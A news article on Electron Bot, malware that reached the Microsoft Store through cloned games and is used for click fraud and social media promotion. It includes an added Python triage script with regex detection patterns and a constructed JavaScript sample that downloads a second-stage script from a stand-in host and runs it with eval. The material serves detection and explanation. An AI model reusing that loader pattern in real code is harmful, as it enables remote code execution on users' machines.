According to the Bleeping Computer website, a malicious program called Electron Bot has entered Microsoft’s official store by cloning popular games such as Subway Surfer and Temple Run, infecting about 5,000 computers in Sweden, Israel, Spain, and Bermuda.
Cyber intelligence firm Check Point discovered and analyzed the malware, which gives attackers complete control of infected devices and supports remote command execution and real-time interaction. The attackers’ main purpose is social media promotion and click fraud, carried out by controlling social media accounts on Facebook, Google, YouTube, and SoundCloud.
Evolution that took three years
An early version of Electron Bot was first discovered in 2018, when an attacker-made photo album app posing as Google Photos appeared in the Microsoft Store. Since then, the attackers have added new features to the tool, such as advanced detection evasion and dynamic script loading.
Electron Bot takes its name from the Electron framework it is written in. It can visit websites and act on them by imitating the browsing behavior of a real person: it uses the Chromium engine bundled with Electron to open a new hidden browser window, set the appropriate HTTP headers, render the requested HTML page, and finally perform mouse movements, scrolling, clicks, and keyboard input.
When Check Point researchers analyzed its activity, they found that the main uses of Electron Bot were:
SEO poisoning – creating malware delivery sites that rank high in Google search results;
Ad clicking – connecting to a remote site in the background and clicking on ads that are not visible to the user;
Social media account promotion – directing traffic to specific content on social media platforms;
Online product promotion – raising a store’s rating by clicking on its ads.
In effect, Electron Bot acts as a middleman, offering these functions as a service to anyone seeking to boost illicit profits, and earning from them in turn.
Commands supported by Electron Bot
Chain of infection
The chain of infection begins when the victim installs a cloned game from the Microsoft Store. At startup, a JavaScript dropper is dynamically loaded in the background to fetch the Electron Bot payload and install it. The malware runs the next time the system starts, connects to its C2 server, retrieves its configuration, and executes arbitrary commands from the attacker. Because the main script is loaded dynamically at runtime, the JS file stored on the device is very small and looks harmless.
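The behaviours described above (a hidden browser window, modified request headers, synthetic mouse and keyboard input, and a small stub that pulls code at runtime) each correspond to a handful of Electron and Node APIs. The following triage heuristic is an added example, not code from the article or from Check Point’s report: the API names are real, but the mapping to indicators, the scoring rules, and both sample scripts are constructed here for illustration.

```python
import re

# Map each behaviour the article describes to the Electron / Node API that
# implements it. The API names are real; treating them as indicators is an
# assumed triage heuristic, not a published detection signature.
INDICATORS = {
    "hidden_window": re.compile(r"new\s+BrowserWindow\s*\(\s*\{[^}]*show\s*:\s*false", re.S),
    "header_spoofing": re.compile(r"onBeforeSendHeaders"),
    "synthetic_input": re.compile(r"\.sendInputEvent\s*\("),
    "dynamic_eval": re.compile(r"\b(eval|new\s+Function|vm\.runInThisContext)\s*\("),
    "network_fetch": re.compile(r"\b(fetch|https?\.get|https?\.request)\s*\("),
}


def triage(js_source: str) -> dict:
    """Scan main-process JavaScript and return the indicators found plus a verdict."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(js_source))
    found = set(hits)
    # One hit alone is common in legitimate apps (e.g. a window created hidden
    # until it is ready). The combinations below are what the article describes.
    automation = {"hidden_window", "synthetic_input"} <= found
    loader = {"dynamic_eval", "network_fetch"} <= found
    if automation and loader:
        verdict = "suspicious"
    elif automation or loader:
        verdict = "review"
    else:
        verdict = "clean"
    return {"hits": hits, "verdict": verdict}


# Constructed sample: an ordinary Electron app that hides its window until ready.
BENIGN_MAIN_JS = """
const { app, BrowserWindow } = require('electron');
app.whenReady().then(() => {
  const win = new BrowserWindow({ width: 800, height: 600, show: false });
  win.once('ready-to-show', () => win.show());
  win.loadFile('index.html');
});
"""

# Constructed sample combining the behaviours the article attributes to the bot.
SUSPECT_MAIN_JS = """
const { app, BrowserWindow, session } = require('electron');
const https = require('https');
app.whenReady().then(() => {
  const win = new BrowserWindow({ show: false });
  session.defaultSession.webRequest.onBeforeSendHeaders((d, cb) => {
    d.requestHeaders['User-Agent'] = 'Mozilla/5.0'; cb({ requestHeaders: d.requestHeaders });
  });
  https.get('https://example.invalid/stage2.js', r => {
    let body = ''; r.on('data', c => body += c); r.on('end', () => eval(body));
  });
  win.webContents.sendInputEvent({ type: 'mouseMove', x: 120, y: 80 });
});
"""
```

Run `triage` over the unpacked JavaScript of an app bundle; a "review" verdict is a prompt for manual inspection, not proof of malice, since minified or bundled code can trip or evade these patterns.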
More than just a game
Check Point found that all of the cloned games carry the malicious functionality described above. Because these operations run “behind the scenes” and are highly covert, the games have relatively good user reviews: Temple Endless Runner 2, released on September 6, 2021, had collected a large number of five-star ratings among its 92 reviews. Of course, the attackers constantly refresh their bait, using different game titles and apps to deliver the malware payload to unsuspecting victims.
Cloned Temple Of Thrones 2 game on the Microsoft Store
While the current versions of Electron Bot do not cause catastrophic damage to infected devices, the attackers could modify the code to fetch a second-stage payload, such as a RAT or even ransomware.
Check Point recommends that Windows users avoid downloading software with very few reviews and double-check the developer or publisher details to make sure the name is correct and contains no spelling errors.